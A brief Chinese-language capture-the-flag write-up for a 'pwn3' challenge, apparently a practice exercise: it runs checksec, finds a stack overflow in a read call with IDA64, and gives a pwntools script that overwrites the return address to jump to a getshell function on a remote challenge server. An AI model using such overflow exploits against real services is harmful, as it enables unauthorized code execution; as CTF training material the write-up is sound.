先把附件下载下来,然后checksec
checksec pwn3
然后IDA64打开
read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag
from pwn import *
context(arch="amd64", os="linux")
p = remote("114.116.54.89", 10003)
p.recv()
p.sendline('a'*0x30+'a'*8+p64(0x0000000000400751))
p.interactive()
#get_shell_ .text 0000000000400751 00000025 00000008 00000000 R . . . B . .